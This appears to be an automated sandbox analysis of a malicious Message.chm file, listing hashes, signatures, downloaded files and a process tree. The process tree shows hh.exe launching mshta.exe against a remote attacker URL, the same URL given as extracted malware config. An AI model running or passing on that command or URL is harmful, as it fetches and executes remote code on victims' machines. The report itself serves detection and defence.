Analysis
-
max time kernel
120s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
21-03-2023 23:32
General
-
Target
Message.chm
-
Size
23KB
-
MD5
a2a8094933150e18fb31f24b5e20643b
-
SHA1
e4a2958358b33ad814828efeaa6295eb46510599
-
SHA256
c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
-
SHA512
24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
-
SSDEEP
384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/7.html
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\INISAFEMailv4[1].cabFilesize
2.2MB
MD58abb4e13ee3f94df4b5e276ef6cb0144
SHA1819db68fcd5a8673383c82898b729f16b77054d2
SHA256c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61
SHA512f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930
-
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.infFilesize
538B
MD510418288c546673054c4bd83220ffeef
SHA1b179588f320e234899a101ecd651bd024569d8bc
SHA256eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971
SHA512a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160